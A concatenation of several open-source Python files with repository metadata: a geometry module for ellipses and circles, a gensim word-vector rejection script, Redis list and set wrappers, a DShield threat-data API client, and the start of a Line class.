        Returns True if the minor axis is parallel to the Y axis, boolean.
        '''
        return min(self.radius.x, self.radius.y) == self.radius.y
    @property
    def eccentricity(self):
        '''
        The ratio of the distance between the two foci to the length
        of the major axis, float.
        0 <= e <= 1
        An eccentricity of zero indicates the ellipse is a circle.
        As e tends towards 1, the ellipse elongates.  It tends to the
        shape of a line segment if the foci remain a finite distance
        apart and a parabola if one focus is kept fixed as the other
        is allowed to move arbitrarily far away.
        '''
        return math.sqrt(1 - ((self.minorRadius / self.majorRadius) ** 2))
    @property
    def e(self):
        '''
        Shorthand notation for eccentricity, float.
        '''
        return self.eccentricity
    @property
    def linearEccentricity(self):
        '''
        Distance between the center of the ellipse and a focus, float.
        '''
        return math.sqrt((self.majorRadius ** 2) - (self.minorRadius ** 2))
    @property
    def f(self):
        '''
        Shorthand notation for linearEccentricity, float.
        '''
        return self.linearEccentricity
    @property
    def a(self):
        '''
        Positive antipodal point on the major axis, Point class.
        '''
        # Offset the center by the major radius along whichever axis is major.
        a = Point(self.center)
        if self.xAxisIsMajor:
            a.x += self.majorRadius
        else:
            a.y += self.majorRadius
        return a
    @property
    def a_neg(self):
        '''
        Negative antipodal point on the major axis, Point class.
        '''
        na = Point(self.center)
        if self.xAxisIsMajor:
            na.x -= self.majorRadius
        else:
            na.y -= self.majorRadius
        return na
    @property
    def b(self):
        '''
        Positive antipodal point on the minor axis, Point class.
        '''
        b = Point(self.center)
        if self.xAxisIsMinor:
            b.x += self.minorRadius
        else:
            b.y += self.minorRadius
        return b
    @property
    def b_neg(self):
        '''
        Negative antipodal point on the minor axis, Point class.
        '''
        nb = Point(self.center)
        if self.xAxisIsMinor:
            nb.x -= self.minorRadius
        else:
            nb.y -= self.minorRadius
        return nb
    @property
    def vertices(self):
        '''
        A dictionary of four points where the axes intersect the ellipse, dict.
        '''
        return {'a': self.a, 'a_neg': self.a_neg,
                'b': self.b, 'b_neg': self.b_neg}
    @property
    def focus0(self):
        '''
        First focus of the ellipse, Point class.
        '''
        # Center shifted by the linear eccentricity along the major axis.
        f = Point(self.center)
        if self.xAxisIsMajor:
            f.x -= self.linearEccentricity
        else:
            f.y -= self.linearEccentricity
        return f
    @property
    def f0(self):
        '''
        Shorthand notation for focus0, Point class
        '''
        return self.focus0
    @property
    def focus1(self):
        '''
        Second focus of the ellipse, Point class.
        '''
        f = Point(self.center)
        if self.xAxisIsMajor:
            f.x += self.linearEccentricity
        else:
            f.y += self.linearEccentricity
        return f
    @property
    def f1(self):
        '''
        Shorthand notation for focus1, Point class
        '''
        return self.focus1
    @property
    def foci(self):
        '''
        A list containing the ellipse's foci, list.
        '''
        return [self.focus0, self.focus1]
    @property
    def majorAxis(self):
        '''
        A line coincident with the ellipse's major axis, Segment class.
        The major axis is the largest distance across an ellipse.
        '''
        return Segment(self.a_neg, self.a)
    @property
    def minorAxis(self):
        '''
        A line coincident with the ellipse' minor axis, Segment class.
        The minor axis is the smallest distance across an ellipse.
        '''
        return Segment(self.b_neg, self.b)
    @property
    def isCircle(self):
        '''
        Is true if the major and minor axes are equal, boolean.
        '''
        return self.radius.x == self.radius.y
    @property
    def isEllipse(self):
        '''
        Is true if the major and minor axes are not equal, boolean.
        '''
        return self.radius.x != self.radius.y
    def __eq__(self, other):
        '''
        a == b iff:
            a.center == b.center
            a.radius.x == b.radius.x
            a.radius.y == b.radius.y
        '''
        # Note: the z component of the radius is deliberately not compared.
        if self.center != other.center:
            return False
        if self.radius.x != other.radius.x:
            return False
        if self.radius.y != other.radius.y:
            return False
        return True
    def __contains__(self, other):
        '''
        x in y
        Is true iff x is a point on or inside the ellipse y.
        '''
        otherType = type(other)
        if issubclass(otherType, Point):
            # Classic focal-distance test: the sum of distances to the foci
            # equals the major-axis length exactly on the perimeter.
            d = sum([other.distance(f) for f in self.foci])
            # d < majorAxis.length interior point
            # d == majorAxis.length on perimeter of ellipse
            # d > majorAxis.length exterior point
            return d <= self.majorAxis.length
        if issubclass(otherType, Segment):
            return (other.A in self) and (other.B in self)
        if issubclass(otherType, Ellipse):
            return (other.majorAxis in self) and (other.minorAxis in self)
        raise TypeError("unknown type '{t}'".format(t=otherType))
    # XXX do math operations on ellipses make sense?
# XXX do math operations on ellipses make sense?
class Circle(Ellipse):
    '''
    Implements a circle in the XY plane with the supplied
    center point and radius.
    Example usage:
    >>> from Geometry import Circle,Point
    >>> u = Circle()
    >>> u
    Circle((0.0,0.0,0.0),1.00)
    >>> import math
    >>> u.area == math.pi
    True
    >>> u.circumfrence == 2 * math.pi
    True
    >>> p = Point.gaussian()
    >>> p in u
    False
    >>> p.xyz = None
    >>> p in u
    True
    >>> p
    Point(0.0,0.0,0.0)
    '''
    @classmethod
    def inscribedInRectangle(cls, rectangle):
        raise NotImplementedError('inscribedInRectangle')
    @classmethod
    def inscribedInTriangle(cls, triangle):
        raise NotImplementedError('inscribedInTriangle')
    @classmethod
    def circumscribingRectangle(cls, rectangle):
        raise NotImplementedError('circumscribingRectangle')
    @classmethod
    def circumscribingTriangle(cls, triangle):
        raise NotImplementedError('circumscribingTriangle')
    @classmethod
    def circumcircleForTriangle(cls, triangle):
        '''
        :param: triangle - Triangle class
        :return: Circle class
        Returns the circle where every vertex in the input triangle is
        on the radius of that circle.
        '''
        if triangle.isRight:
            # circumcircle origin is the midpoint of the hypotenuse
            o = triangle.hypotenuse.midpoint
            r = o.distance(triangle.A)
            return cls(o, r)
        # otherwise:
        # 1. find the normals to two sides
        # 2. translate them to the midpoints of those two sides
        # 3. intersect those lines for center of circumcircle
        # 4. radius is distance from center to any vertex in the triangle
        abn = triangle.AB.normal
        abn += triangle.AB.midpoint
        acn = triangle.AC.normal
        acn += triangle.AC.midpoint
        o = abn.intersection(acn)
        r = o.distance(triangle.A)
        return cls(o, r)
    def __init__(self, center=None, radius=1.0):
        '''
        :param: center - optional Point class initializer
        :param: radius - optional float
        Defaults to a unit circle centered on the origin.
        '''
        self.center = center
        self.radius = radius
    @property
    def radius(self):
        '''
        The circle's radius, float.
        '''
        # Lazily default to a unit radius; note this shadows Ellipse.radius
        # (a Point) with a scalar.
        try:
            return self._radius
        except AttributeError:
            pass
        self._radius = 1.0
        return self._radius
    @radius.setter
    def radius(self, newValue):
        self._radius = float(newValue)
    @property
    def diameter(self):
        '''
        The circle's diameter, float.
        '''
        return self.radius * 2
    @property
    def circumfrence(self):
        '''
        The circle's circumfrence, float.
        '''
        return 2 * math.pi * self.radius
    @property
    def area(self):
        '''
        The circle's area, float.
        '''
        return math.pi * (self.radius ** 2)
    @property
    def a(self):
        '''
        Positive antipodal point on the X axis, Point class.
        '''
        # Bug fix: the original returned Point(self.radius, self.center.y),
        # silently dropping the center's X offset for circles not centered
        # on the origin (Ellipse's versions offset from self.center).
        return Point(self.center.x + self.radius, self.center.y)
    @property
    def a_neg(self):
        '''
        Negative antipodal point on the X axis, Point class.
        '''
        return Point(self.center.x - self.radius, self.center.y)
    @property
    def b(self):
        '''
        Positive antipodal point on the Y axis, Point class.
        '''
        return Point(self.center.x, self.center.y + self.radius)
    @property
    def b_neg(self):
        '''
        Negative antipodal point on the Y axis, Point class.
        '''
        return Point(self.center.x, self.center.y - self.radius)
    def __contains__(self, other):
        '''
        :param: Point | Segment | Ellipse class
        :return: boolean
        Returns True if the distance from the center to the point
        is less than or equal to the radius.
        '''
        otherType = type(other)
        if issubclass(otherType, Point):
            return other.distance(self.center) <= self.radius
        if issubclass(otherType, Segment):
            return (other.A in self) and (other.B in self)
        if issubclass(otherType, Circle):
            # NOTE(review): this tests whether the midpoint between centers
            # lies within both radii, which is not standard circle
            # containment (d + other.radius <= self.radius) -- confirm
            # intended semantics before relying on it.
            m = self.center.distance(other.center) / 2
            return (m <= self.radius) and (m <= other.radius)
        if issubclass(otherType, Ellipse):
            return (other.majorAxis in self) and (other.minorAxis in self)
        raise TypeError("unknown type '{t}'".format(t=otherType))
    def doesIntersect(self, other):
        '''
        :param: other - Circle class
        Returns True iff:
          self.center.distance(other.center) <= self.radius+other.radius
        '''
        otherType = type(other)
        if issubclass(otherType, Ellipse):
            # NOTE(review): for a plain Ellipse, `other.radius` is a Point,
            # so the sum below would fail; this path effectively only works
            # for Circle arguments -- confirm.
            distance = self.center.distance(other.center)
            radiisum = self.radius + other.radius
            return distance <= radiisum
        if issubclass(otherType, Line):
            raise NotImplementedError('doesIntersect,other is Line class')
        raise TypeError("unknown type '{t}'".format(t=otherType))
class Sphere(Circle):
    """A sphere: extends Circle with the volume it bounds."""

    @property
    def volume(self):
        """The spherical volume bounded by this circle's radius, float."""
        return (4. / 3.) * math.pi * (self.radius ** 3)
| {
"repo_name": "JnyJny/Geometry",
"path": "Geometry/ellipse.py",
"copies": "1",
"size": "13860",
"license": "mit",
"hash": 5863393421034708000,
"line_mean": 23.6181172291,
"line_max": 79,
"alpha_frac": 0.5570707071,
"autogenerated": false,
"ratio": 4.078869923484403,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 563
} |
#A pythonic implementation of @bmschmidt 's 'vector reject'. To be used in gensim.
import numpy as np
from gensim import matutils
from numpy import float32 as REAL
from gensim.models import Word2Vec
from numpy import array
from unicodedata import normalize
# Bug fix: an unresolved merge conflict (<<<<<<< HEAD / ======= / >>>>>>>)
# made this module a syntax error.  Resolved in favor of the origin/master
# side: the HEAD branch loaded the same Kantipur model from a OneDrive path,
# which the two loads below supersede.
print("libraries loaded")
model = Word2Vec.load(r'C:\Users\n0272436\Desktop\datasets\Kantipur')
print("model 1 loaded")
model1 = Word2Vec.load(r'C:\Users\n0272436\Desktop\datasets\v1.model')
print("model 2 loaded")
def reject(A, B):
    """Return the vector rejection of A from B: ``A - dot(A, B) * B``.

    Subtracts from A its projection onto B.  The formula is exact when B is
    a unit vector -- callers here pass matutils.unitvec output, TODO confirm
    for any new call sites.
    """
    # Bug fix: use the public np.dot instead of the private
    # np.linalg.linalg.dot module path (removed in modern numpy).
    projection = np.dot(A, B) * B
    return A - projection
def reject_words(A, B):
    '''Takes two **LIST OF WORDS** and
    returns most_similar for word A, while rejecting words with meanings closer to B.
    Seems to work better than just giving in negative words.
    '''
    # Bug fix: the def line ended in a stray token (`:compa`), a syntax
    # error.  The unused `in_words` local has also been dropped.
    basic_word = [model[each] for each in A]
    reject_word = [model[each] for each in B]
    basic_mean = matutils.unitvec(array(basic_word).mean(axis=0)).astype(REAL)
    reject_mean = matutils.unitvec(array(reject_word).mean(axis=0)).astype(REAL)
    r = reject(basic_mean, reject_mean)
    # Rank every vocabulary vector against the rejected query direction.
    dists = np.dot(model.syn0, r)
    best = matutils.argsort(dists, topn=500, reverse=True)
    # Filter out results containing the first query word itself.
    result = [(model.index2word[sim], float(dists[sim]))
              for sim in best if A[0] not in model.index2word[sim]]
    return result
def createTranspose(word):
    """Return the unique variants of *word* made by swapping each short/long
    Devanagari vowel matra for its counterpart (u <-> uu, i <-> ii)."""
    matras = ['ु', 'ू', 'ि', 'ी']
    variants = []
    for idx, matra in enumerate(matras):
        # Matras are stored in short/long pairs; pick the partner in the pair.
        partner = matras[idx + 1] if idx % 2 == 0 else matras[idx - 1]
        variants.append(word.replace(matra, partner))
    return list(set(variants))
#def compareModels(A, B):
def reject_words_1(A, B, model = model):
    '''Takes two **LIST OF WORDS** and
    returns most_similar for word A, while rejecting words with meanings closer to B.
    Seems to work better than just giving in negative words.
    '''
    # NOTE(review): near-duplicate of reject_words(); the differences are the
    # explicit `model` parameter (whose default binds the module-level global
    # at definition time) and the use of syn0norm (unit-normalized vectors)
    # instead of syn0 -- presumably intentional, confirm before merging them.
    # `in_words` is computed but never used.
    in_words = A+B
    basic_word = [model[each] for each in A]
    reject_word = [model[each] for each in B]
    basic_mean = matutils.unitvec(array(basic_word).mean(axis=0)).astype(REAL)
    reject_mean = matutils.unitvec(array(reject_word).mean(axis=0)).astype(REAL)
    r = reject(basic_mean, reject_mean)
    # Cosine-style ranking against the normalized vocabulary matrix.
    dists = np.linalg.linalg.dot(model.syn0norm, r)
    best = matutils.argsort(dists, topn = 500, reverse = True)
    # Drop results containing the first query word itself.
    result = [(model.index2word[sim], float(dists[sim])) for sim in best if A[0] not in model.index2word[sim]]
    return result
from tabulate import tabulate
def clearRoot(lst, word):
    """Return the entries of *lst* that do not contain the substring *word*."""
    return [entry for entry in lst if word not in entry]
def compareWords(wordlist1, wordlist2, multimodal=False):
    """Print a side-by-side comparison of gensim's built-in most_similar
    ranking and the vector-rejection ranking, for one or both loaded models.

    The dead commented-out code (including a stray non-ASCII token that made
    the trailing comment confusing) has been removed.
    """
    regular_sim = model.most_similar(wordlist1, negative=wordlist2, topn=200)
    rejectWords1 = reject_words_1(wordlist1, wordlist2, model)
    r = wordlist1[0]
    if not multimodal:
        # NOTE(review): printJustified takes four columns after the merge
        # resolution; this two-argument call would raise TypeError -- confirm
        # the intended single-model output format.
        printJustified(['regular_sim'] + list(list(zip(*regular_sim))[0]),
                       ['reject_syn0norm'] + list(list(zip(*rejectWords1))[0]))
    else:
        regular_sim_1 = model1.most_similar(wordlist1, negative=wordlist2, topn=200)
        rejectWords1_1 = reject_words_1(wordlist1, wordlist2, model1)
        print(
            tabulate({"mod0_regular_sim": clearRoot(list(list(zip(*regular_sim))[0]), r)[:20],
                      "mod0_reject_syn0norm": clearRoot(list(list(zip(*rejectWords1))[0]), r)[:20],
                      'mod1_regular_sim': clearRoot(list(list(zip(*regular_sim_1))[0]), r)[:20],
                      'mod1_reject_syn0norm': clearRoot(list(list(zip(*rejectWords1_1))[0]), r)[:20]
                      },
                     headers='keys')
        )
# Bug fix: an unresolved merge conflict left two incompatible versions of
# printJustified (3-arg HEAD vs 4-arg master) plus a stray call fragment,
# making the module a syntax error.  Resolved in favor of the origin/master
# four-column signature, which matches the four result lists built by
# compareWords in multimodal mode.
def printJustified(res1, res2, res3, res4):
    """Print four parallel result columns, each left-justified to 15 chars."""
    for cols in zip(res1, res2, res3, res4):
        # NOTE(review): the original computed NFD-normalized lengths but
        # never used them; ljust on composed Devanagari strings may still
        # misalign columns visually -- confirm whether width compensation
        # is needed.
        print('| ' + cols[0].ljust(15) + '|' + cols[1].ljust(15) + '| ' +
              cols[2].ljust(15) + ' |' + cols[3].ljust(15))
| {
"repo_name": "shirish93/CoLing",
"path": "vector_reject.py",
"copies": "1",
"size": "4858",
"license": "mit",
"hash": 9167192636570802000,
"line_mean": 39.35,
"line_max": 108,
"alpha_frac": 0.6437422553,
"autogenerated": false,
"ratio": 3.0338345864661656,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8954672789576941,
"avg_score": 0.0445808104378448,
"num_lines": 120
} |
"A pythonic interface to a Redis dictionary."
import redis_ds.redis_config as redis_config
from redis_ds.serialization import PassThroughSerializer, PickleSerializer, JSONSerializer
class RedisList(PassThroughSerializer):
    "Interface to a Redis list."
    def __init__(self, list_key, redis_client=redis_config.CLIENT):
        "Initialize interface with the list's Redis key and a client."
        self._client = redis_client
        self.list_key = list_key

    def __len__(self):
        "Number of values in list."
        return self._client.llen(self.list_key)

    def __getitem__(self, key):
        """Retrieve a value by index or values by slice syntax.

        NOTE(review): slice bounds follow Redis LRANGE semantics (stop is
        inclusive, -1 means the last element), not Python's exclusive stop.
        """
        if isinstance(key, int):
            return self.deserialize(self._client.lindex(self.list_key, key))
        elif hasattr(key, 'start') and hasattr(key, 'stop'):
            # BUG FIX: use explicit None checks so an explicit bound of 0
            # is honored ('key.stop or -1' turned list[0:0] into the
            # whole list).
            start = key.start if key.start is not None else 0
            stop = key.stop if key.stop is not None else -1
            values = self._client.lrange(self.list_key, start, stop)
            return [self.deserialize(value) for value in values]
        else:
            raise IndexError

    def __setitem__(self, pos, val):
        "Set the value at a position."
        val = self.serialize(val)
        return self._client.lset(self.list_key, pos, val)

    def append(self, val, head=False):
        "Append a value to list to rear or front."
        val = self.serialize(val)
        if head:
            return self._client.lpush(self.list_key, val)
        else:
            return self._client.rpush(self.list_key, val)

    def pop(self, head=False, blocking=False):
        """Remove a value from head or tail of list.

        blocking=True waits for a value to arrive instead of returning
        None on an empty list.
        """
        if head and blocking:
            # b*pop return a (key, value) tuple; only the value is wanted
            return self.deserialize(self._client.blpop(self.list_key)[1])
        elif head:
            return self.deserialize(self._client.lpop(self.list_key))
        elif blocking:
            return self.deserialize(self._client.brpop(self.list_key)[1])
        else:
            return self.deserialize(self._client.rpop(self.list_key))

    def __unicode__(self):
        "Represent entire list."
        return u"RedisList(%s)" % (self[0:-1],)

    def __repr__(self):
        "Represent entire list."
        return self.__unicode__()
class PickleRedisList(RedisList, PickleSerializer):
    "RedisList that pickles values on write and unpickles them on read."
    pass
class JSONRedisList(RedisList, JSONSerializer):
    "RedisList that stores values as JSON strings."
    pass
| {
"repo_name": "lethain/Redis-Python-Datastructures",
"path": "redis_ds/redis_list.py",
"copies": "1",
"size": "2372",
"license": "mit",
"hash": -7914642033916656000,
"line_mean": 33.3768115942,
"line_max": 90,
"alpha_frac": 0.6214165261,
"autogenerated": false,
"ratio": 3.933665008291874,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00015926102882624622,
"num_lines": 69
} |
"A Pythonic interface to a Redis set."
import redis_ds.redis_config as redis_config
from redis_ds.serialization import PassThroughSerializer, PickleSerializer, JSONSerializer
class RedisSet(PassThroughSerializer):
    "An object which behaves like a Python set, but which is backed by Redis."
    def __init__(self, set_key, redis_client=redis_config.CLIENT):
        "Initialize the set with its Redis key and a client."
        self._client = redis_client
        self.set_key = set_key

    def __len__(self):
        "Number of values in the set."
        return self._client.scard(self.set_key)

    def add(self, val):
        "Add a value to the set."
        val = self.serialize(val)
        self._client.sadd(self.set_key, val)

    def update(self, vals):
        "Idempotently add multiple values to the set."
        vals = [self.serialize(x) for x in vals]
        # guard: SADD with zero members is a Redis error, so an empty
        # iterable becomes a no-op instead of raising
        if vals:
            self._client.sadd(self.set_key, *vals)

    def __contains__(self, val):
        "Check if a value is a member of the set."
        # BUG FIX: serialize before the membership test so it agrees with
        # add()/remove(), which store the serialized form (previously
        # broken for the Pickle/JSON subclasses).
        return self._client.sismember(self.set_key, self.serialize(val))

    def pop(self):
        "Remove and return an arbitrary value from the set."
        return self.deserialize(self._client.spop(self.set_key))

    def remove(self, val):
        "Remove a specific value from the set."
        self._client.srem(self.set_key, self.serialize(val))

    def __unicode__(self):
        "Represent all members in the set."
        objs = self._client.smembers(self.set_key)
        objs = [self.deserialize(x) for x in objs]
        return u"RedisSet(%s)" % (objs,)

    def __repr__(self):
        "Represent all members in the set."
        return self.__unicode__()
class PickleRedisSet(RedisSet, PickleSerializer):
    "RedisSet that pickles values on write and unpickles them on read."
    pass
class JSONRedisSet(RedisSet, JSONSerializer):
    "RedisSet that stores values as JSON strings."
    pass
| {
"repo_name": "lethain/Redis-Python-Datastructures",
"path": "redis_ds/redis_set.py",
"copies": "1",
"size": "1836",
"license": "mit",
"hash": -5831451216841437000,
"line_mean": 30.6551724138,
"line_max": 90,
"alpha_frac": 0.6252723312,
"autogenerated": false,
"ratio": 3.817047817047817,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49423201482478174,
"avg_score": null,
"num_lines": null
} |
"""A Pythonic interface to the Internet Storm Center / DShield API."""
import datetime
import requests
__version__ = "0.2.1"
XML = "?xml"
JSON = "?json"
TEXT = "?text"
PHP = "?php"
__BASE_URL = "https://dshield.org/api/"
class Error(Exception):
    """Raised when the DShield API reports invalid input (e.g. bad IP or port)."""
def _get(function, return_format=None):
    """Fetch data for an API endpoint and return it.

    When return_format is given, the raw response body is returned as a
    string; otherwise the JSON suffix is used and the parsed object
    (list or dict) is returned.
    """
    fmt = return_format if return_format else JSON
    response = requests.get(''.join([__BASE_URL, function, fmt]))
    if return_format:
        return response.text
    return response.json()
def backscatter(date=None, rows=None, return_format=None):
    """Returns possible backscatter data.

    This report only includes "syn ack" data and is summarized by source port.

    :param date: optional string (in Y-M-D format) or datetime.date() object
    :param rows: optional number of rows returned (default 1000)
    :returns: list -- backscatter data.
    """
    parts = ['backscatter']
    if date:
        # EAFP: date objects expose strftime, plain strings do not
        try:
            parts.append(date.strftime("%Y-%m-%d"))
        except AttributeError:
            parts.append(date)
    if rows:
        parts.append(str(rows))
    return _get('/'.join(parts), return_format)
def handler(return_format=None):
    """Returns the name of the handler of the day."""
    endpoint = 'handler'
    return _get(endpoint, return_format)
def infocon(return_format=None):
    """Returns the current infocon level (green, yellow, orange, red)."""
    endpoint = 'infocon'
    return _get(endpoint, return_format)
def ip(ip_address, return_format=None):
    """Returns a summary of the information our database holds for a
    particular IP address (similar to /ipinfo.html).

    In the returned data:

    Count: (also reports or records) total number of packets blocked from
    this IP.
    Attacks: (also targets) number of unique destination IP addresses for
    these packets.

    :param ip_address: a valid IP address
    """
    uri = 'ip/{address}'.format(address=ip_address)
    response = _get(uri, return_format)
    # the API signals bad input inside the payload rather than via HTTP
    if 'bad IP address' in str(response):
        raise Error('Bad IP address, {address}'.format(address=ip_address))
    return response
def port(port_number, return_format=None):
    """Summary information about a particular port.

    In the returned data:

    Records: Total number of records for a given date.
    Targets: Number of unique destination IP addresses.
    Sources: Number of unique originating IPs.

    :param port_number: a string or integer port number
    """
    uri = 'port/{number}'.format(number=port_number)
    response = _get(uri, return_format)
    # the API signals bad input inside the payload rather than via HTTP
    if 'bad port number' in str(response):
        raise Error('Bad port number, {number}'.format(number=port_number))
    return response
def portdate(port_number, date=None, return_format=None):
    """Information about a particular port at a particular date.

    If the date is omitted, today's date is used.

    :param port_number: a string or integer port number
    :param date: an optional string in 'Y-M-D' format or datetime.date() object
    """
    parts = ['portdate/{number}'.format(number=port_number)]
    if date:
        # EAFP: date objects expose strftime, plain strings do not
        try:
            parts.append(date.strftime("%Y-%m-%d"))
        except AttributeError:
            parts.append(date)
    response = _get('/'.join(parts), return_format)
    if 'bad port number' in str(response):
        raise Error('Bad port number, {number}'.format(number=port_number))
    return response
def topports(sort_by='records', limit=10, date=None, return_format=None):
    """Information about top ports for a particular date with return limit.

    :param sort_by: one of 'records', 'targets', 'sources'
    :param limit: number of records to be returned
    :param date: an optional string in 'Y-M-D' format or datetime.date() object
    """
    parts = ['topports', sort_by, str(limit)]
    if date:
        try:
            parts.append(date.strftime("%Y-%m-%d"))
        except AttributeError:
            parts.append(date)
    return _get('/'.join(parts), return_format)
def topips(sort_by='records', limit=10, date=None, return_format=None):
    """Information about top IPs for a particular date with return limit.

    :param sort_by: one of 'records', 'attacks'
    :param limit: number of records to be returned
    :param date: an optional string in 'Y-M-D' format or datetime.date() object
    """
    uri = '/'.join(['topips', sort_by, str(limit)])
    if date:
        # EAFP: date objects expose strftime, plain strings do not
        try:
            uri = '/'.join([uri, date.strftime("%Y-%m-%d")])
        except AttributeError:
            uri = '/'.join([uri, date])
    return _get(uri, return_format)
def sources(sort_by='attacks', limit=10, date=None, return_format=None):
    """Information summary from the last 30 days about source IPs with return
    limit.

    :param sort_by: one of 'ip', 'count', 'attacks', 'firstseen', 'lastseen'
    :param limit: number of records to be returned (max 10000)
    :param date: an optional string in 'Y-M-D' format or datetime.date() object
    """
    parts = ['sources', sort_by, str(limit)]
    if date:
        try:
            parts.append(date.strftime("%Y-%m-%d"))
        except AttributeError:
            parts.append(date)
    return _get('/'.join(parts), return_format)
def porthistory(port_number, start_date=None, end_date=None, return_format=None):
    """Returns port data for a range of dates.

    In the return data:

    Records: Total number of records for a given date range.
    Targets: Number of unique destination IP addresses.
    Sources: Number of unique originating IPs.

    :param port_number: a valid port number (required)
    :param start_date: string or datetime.date(), default is 30 days ago
    :param end_date: string or datetime.date(), default is today
    """
    if not start_date:
        # default: 30 days ago
        start_date = datetime.datetime.now() - datetime.timedelta(days=30)
    parts = ['porthistory/{port}'.format(port=port_number)]
    try:
        parts.append(start_date.strftime("%Y-%m-%d"))
    except AttributeError:
        parts.append(start_date)
    if end_date:
        try:
            parts.append(end_date.strftime("%Y-%m-%d"))
        except AttributeError:
            parts.append(end_date)
    response = _get('/'.join(parts), return_format)
    if 'bad port number' in str(response):
        raise Error('Bad port, {port}'.format(port=port_number))
    return response
def asnum(number, limit=None, return_format=None):
    """Returns a summary of the information our database holds for a
    particular ASNUM (similar to /asdetailsascii.html) with return limit.

    :param limit: number of records to be returned (max 2000)
    """
    parts = ['asnum/{number}'.format(number=number)]
    if limit:
        parts.append(str(limit))
    return _get('/'.join(parts), return_format)
def dailysummary(start_date=None, end_date=None, return_format=None):
    """Returns daily summary totals of targets, attacks and sources. Limit to
    30 days at a time. (Query 2002-01-01 to present)

    In the return data:

    Sources: Distinct source IP addresses the packets originate from.
    Targets: Distinct target IP addresses the packets were sent to.
    Reports: Number of packets reported.

    :param start_date: string or datetime.date(), default is today
    :param end_date: string or datetime.date(), default is today
    """
    if not start_date:
        # default: today
        start_date = datetime.datetime.now()
    parts = ['dailysummary']
    try:
        parts.append(start_date.strftime("%Y-%m-%d"))
    except AttributeError:
        parts.append(start_date)
    if end_date:
        try:
            parts.append(end_date.strftime("%Y-%m-%d"))
        except AttributeError:
            parts.append(end_date)
    return _get('/'.join(parts), return_format)
def daily404summary(date, return_format=None):
    """Returns daily summary information of submitted 404 Error Page
    Information.

    :param date: string or datetime.date() (required)
    """
    parts = ['daily404summary']
    if date:
        try:
            parts.append(date.strftime("%Y-%m-%d"))
        except AttributeError:
            parts.append(date)
    return _get('/'.join(parts), return_format)
def daily404detail(date, limit=None, return_format=None):
    """Returns detail information of submitted 404 Error Page Information.

    :param date: string or datetime.date() (required)
    :param limit: string or int, limit for number of returned items
    """
    parts = ['daily404detail']
    if date:
        try:
            parts.append(date.strftime("%Y-%m-%d"))
        except AttributeError:
            parts.append(date)
    if limit:
        parts.append(str(limit))
    return _get('/'.join(parts), return_format)
def glossary(term=None, return_format=None):
    """List of glossary terms and definitions.

    :param term: a whole or partial word to "search" in the API
    """
    uri = '/'.join(['glossary', term]) if term else 'glossary'
    return _get(uri, return_format)
def webhoneypotsummary(date, return_format=None):
    """API data for `Webhoneypot: Web Server Log Project
    <https://dshield.org/webhoneypot/>`_.

    :param date: string or datetime.date() (required)
    """
    try:
        datepart = date.strftime("%Y-%m-%d")
    except AttributeError:
        datepart = date
    return _get('/'.join(['webhoneypotsummary', datepart]), return_format)
def webhoneypotbytype(date, return_format=None):
    """API data for `Webhoneypot: Attack By Type
    <https://isc.sans.edu/webhoneypot/types.html>`_. We currently use a set
    of regular expressions to determine the type of attack used to attack the
    honeypot. Output is the top 30 attacks for the last month.

    :param date: string or datetime.date() (required)
    """
    try:
        datepart = date.strftime("%Y-%m-%d")
    except AttributeError:
        datepart = date
    return _get('/'.join(['webhoneypotbytype', datepart]), return_format)
| {
"repo_name": "rshipp/python-dshield",
"path": "dshield.py",
"copies": "1",
"size": "10189",
"license": "bsd-3-clause",
"hash": -8443831260920060000,
"line_mean": 32.9633333333,
"line_max": 81,
"alpha_frac": 0.6295024046,
"autogenerated": false,
"ratio": 3.763945326930181,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9887798029408688,
"avg_score": 0.0011299404242986347,
"num_lines": 300
} |
'''a pythonic Line
'''
import collections
import collections.abc
import math

from . import Point
from .constants import *
from .exceptions import InfiniteLength, CollinearPoints, ParallelLines
# NOTE: collections.abc.Mapping is used because collections.Mapping was
# removed in Python 3.10.
class Line(collections.abc.Mapping):
    '''
    A line with infinite length defined by two points; A and B.

    Usage:
    >>> a = Line()
    ...
    >>> b = Line((0,0),(1,1))
    >>> c = Line(Point(),{'y':1,'x':1})
    >>> b == c
    True
    >>>
    '''

    @classmethod
    def fromSegment(cls, segment):
        '''
        :param: segment - Segment subclass
        :return: Line subclass

        Returns a coincident Line object.
        '''
        return cls(segment.A, segment.B)

    @classmethod
    def fromRay(cls, ray):
        '''
        :param: ray - Ray subclass
        :return: Line subclass

        Returns a coincident Line object.
        '''
        return cls(ray.A, ray.B)

    @classmethod
    def fromLine(cls, line):
        '''
        :param: line - Line subclass
        :return: Line subclass

        Returns a new coincident Line object.
        '''
        return cls(line.A, line.B)

    @classmethod
    def units(cls):
        '''
        Returns a list of three 'unit' lines whose first point is the origin
        and second points are (1,0,0), (0,1,0) and (0,0,1).
        '''
        return [cls(B=p) for p in Point.units()]

    def __init__(self, *args, **kwds):
        '''
        line(<iterable>,A=..,B=...)
        '''
        self(*args, **kwds)

    def __call__(self, *args, **kwds):
        '''
        Initialize (or re-initialize) A and B from positional iterables
        and/or the keyword arguments 'A' and 'B'; keywords win.
        '''
        if len(args) == 1:
            self.A, self.B = args[0]
        if len(args) > 1:
            self.A, self.B = args
        for p in ['A', 'B']:
            try:
                setattr(self, p, kwds[p])
            except KeyError:
                pass

    @property
    def A(self):
        '''
        First defining point of the line, Point subclass.
        Created lazily on first access.
        '''
        try:
            return self._A
        except AttributeError:
            pass
        self._A = Point()
        return self._A

    @A.setter
    def A(self, newValue):
        # mutate the existing Point in place rather than rebinding it
        self.A.xyz = newValue

    @property
    def B(self):
        '''
        Second defining point of the line, Point subclass.
        Created lazily on first access.
        '''
        try:
            return self._B
        except AttributeError:
            pass
        self._B = Point()
        return self._B

    @B.setter
    def B(self, newValue):
        self.B.xyz = newValue

    def __iter__(self):
        # iterate the two defining points, A then B
        return iter(self.AB)

    @property
    def AB(self):
        '''
        A list containing Points A and B.
        '''
        try:
            return self._AB
        except AttributeError:
            pass
        self._AB = [self.A, self.B]
        return self._AB

    @AB.setter
    def AB(self, newValues):
        try:
            self.A, self.B = newValues
        except ValueError:
            # a single value updates A only
            self.A = newValues

    @property
    def isVertical(self):
        '''
        True iff A and B share the same x coordinate, boolean.
        '''
        return (self.A.x == self.B.x)

    @property
